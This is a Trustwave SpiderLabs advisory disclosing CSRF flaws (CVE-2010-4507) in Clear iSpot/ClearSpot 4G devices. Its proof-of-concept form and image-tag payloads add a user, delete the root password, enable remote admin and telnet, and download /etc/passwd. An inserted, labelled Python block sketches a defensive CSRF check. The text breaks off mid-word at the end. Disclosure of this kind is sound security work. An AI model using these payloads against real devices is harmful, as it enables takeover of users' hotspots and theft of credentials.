Clear iSpot/Clearspot CSRF Vulnerabilities


Trustwave's SpiderLabs Security Advisory TWSL2010-008:
Clear iSpot/Clearspot CSRF Vulnerabilities

https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt

Published: 2010-12-10
Version: 1.0

Vendor: Clear (http://www.clear.com)
Products: iSpot/ClearSpot 4G (http://www.clear.com/devices)
Versions affected:
The observed behavior is the result of a design choice, and may be present
on multiple versions. The specific versions used during testing are
given below.

iSpot version: 2.0.0.0 [R1679 (Jul 6 2010 17:57:37)]
ClearSpot versions: 2.0.0.0 [R1512 (May 31 2010 18:57:09)]
                    2.0.0.0 [R1786 (Aug 4 2010 20:09:06)]
Firmware Version: 1.9.9.4
Hardware Version: R051.2
Device Name: IMW-C615W
Device Manufacturer: INFOMARK (http://infomark.co.kr/)

Product Description:
iSpot and ClearSpot 4G are portable 4G devices that allow users to share
and broadcast their own personal WiFi network. The device connects up to 8
clients at the same time on the same 4G connection.

Credit: Matthew Jakuboski of Trustwave's SpiderLabs

CVE: CVE-2010-4507

Finding:
These devices are susceptible to Cross-Site Request Forgery (CSRF).
An attacker who is able to coerce a ClearSpot/iSpot user into
following a link can execute arbitrary system commands on the device.

The following examples will allow an attacker to enable remote access to
the iSpot and ClearSpot 4G, and to add their own account to the device. This
level of access also exposes the device's client-side SSL certificates, which
are used to perform device authentication. This could lead to a compromise of
ClearWire accounts as well as other personal information.

Add new user:
<form method="post" action="http://server/cgi-bin/webmain.cgi">
<input type="hidden" name="act" value="act_assist_result">
<input type="hidden" name="cmd" value="adduser -S jaku">
<input type="submit">
</form>

or

<img src="http://server/cgi-bin/webmain.cgi?act=act_cmd_result&cmd=adduser%20-S%20jaku">

Remove root password:
<form method="post" action="http://server/cgi-bin/webmain.cgi">
<input type="hidden" name="act" value="act_assist_result">
<input type="hidden" name="cmd" value="passwd -d root">
<input type="submit">
</form>

or

<img src="http://server/cgi-bin/webmain.cgi?act=act_cmd_result&cmd=passwd%20-d%20root">

Enable remote administration access:
<form method="post" action="http://server/cgi-bin/webmain.cgi">
<input type="hidden" name="act" value="act_network_set">
<input type="hidden" name="enable_remote_access" value="YES">
<input type="hidden" name="remote_access_port" value="80">
<input type="submit">
</form>

or

<img src="http://server/cgi-bin/webmain.cgi?act=act_network_set&enable_remote_access=YES&remote_access_port=80">

Enable telnet if not already enabled:
<form method="post" action="http://server/cgi-bin/webmain.cgi">
<input type="hidden" name="act" value="act_set_wimax_etc_config">
<input type="hidden" name="ENABLE_TELNET" value="YES">
<input type="submit">
</form>

or

<img src="http://server/cgi-bin/webmain.cgi?act=act_set_wimax_etc_config&ENABLE_TELNET=YES">

Allow remote telnet access:
<form method="post" action="http://server/cgi-bin/webmain.cgi">
<input type="hidden" name="act" value="act_network_set">
<input type="hidden" name="add_enable" value="YES">
<input type="hidden" name="add_host_ip" value="1">
<input type="hidden" name="add_port" value="23">
<input type="hidden" name="add_protocol" value="BOTH">
<input type="hidden" name="add_memo" value="admintelnet">
<input type="submit">
</form>

or

<img src="http://server/cgi-bin/webmain.cgi?act=act_network_set&add_enable=YES&add_host_ip=1&add_port=23&add_protocol=both&add_memo=admintelnet">

Once compromised, it is possible to download any file from the device
using the following method.

Download /etc/passwd file:
<form method="post" action="http://server/cgi-bin/upgrademain.cgi">
<input type="hidden" name="act" value="act_file_download">
<input type="hidden" name="METHOD" value="PATH">
<input type="hidden" name="FILE_PATH" value="/etc/passwd">
<input type="submit">
</form>

or

<img src="http://server/cgi-bin/upgrademain.cgi?act=act_file_download&METHOD=PATH&FILE_PATH=/etc/passwd">

Vendor Response:
No official response is available at the time of release.

Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.
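The following is added example code, not part of the advisory and not the vendor's firmware. It models how a handler such as webmain.cgi or upgrademain.cgi could refuse the forged requests shown above: the state-changing act values are accepted only via POST, only from the device's own origin, and only with a per-session synchronizer token. The device host 192.168.1.1, the parameter name csrf_token and all function names are assumptions.

```python
from urllib.parse import parse_qs, urlsplit
import hmac
import secrets

# Hypothetical model of a hardened webmain.cgi/upgrademain.cgi request check.
DEVICE_HOSTS = {"192.168.1.1", "server"}          # assumed device addresses
# 'act' values from the advisory that change state or read device files
SENSITIVE_ACTS = {"act_assist_result", "act_cmd_result", "act_network_set",
                  "act_set_wimax_etc_config", "act_file_download"}


def new_csrf_token() -> str:
    """Per-session synchronizer token the device would embed in its own forms."""
    return secrets.token_hex(16)


def parse_request(url: str) -> dict:
    """Flatten a request URL's query string into {name: value} (first value wins)."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def check_request(method: str, headers: dict, params: dict, session_token: str):
    """Return (allowed, reason). Read-only actions pass; sensitive ones must be
    POSTed from the device's own origin and carry the session's CSRF token."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    act = params.get("act", "")
    if act not in SENSITIVE_ACTS:
        return True, "read-only action"
    # 1. A GET (e.g. an <img src=...> on a third-party page) never changes state.
    if method.upper() != "POST":
        return False, "sensitive act requested via GET"
    # 2. Origin (or Referer as fallback) must name the device itself.
    source = hdrs.get("origin") or hdrs.get("referer")
    if not source:
        return False, "missing Origin/Referer"
    host = urlsplit(source).hostname
    if host not in DEVICE_HOSTS:
        return False, f"cross-site request from {host}"
    # 3. Token must match the session's token; compare in constant time.
    supplied = params.get("csrf_token", "").encode()
    if not hmac.compare_digest(supplied, session_token.encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"
```

With a check like this in place, both the cross-site form and the <img src=...> variants above are rejected before cmd is ever executed; the Origin/Referer test alone is not sufficient, since a missing Referer is common, so the token is the primary control.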

Vendor Communication Timeline:
8/26/10 - Vendor contact initiated.
9/30/10 - Vulnerability details provided to vendor.
12/3/10 - Notified vendor of release date. No workaround or patch provided.
12/10/10 - Advisory published.

Revision History:
1.0 Initial publication

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations -- ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers -- manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago
offices t
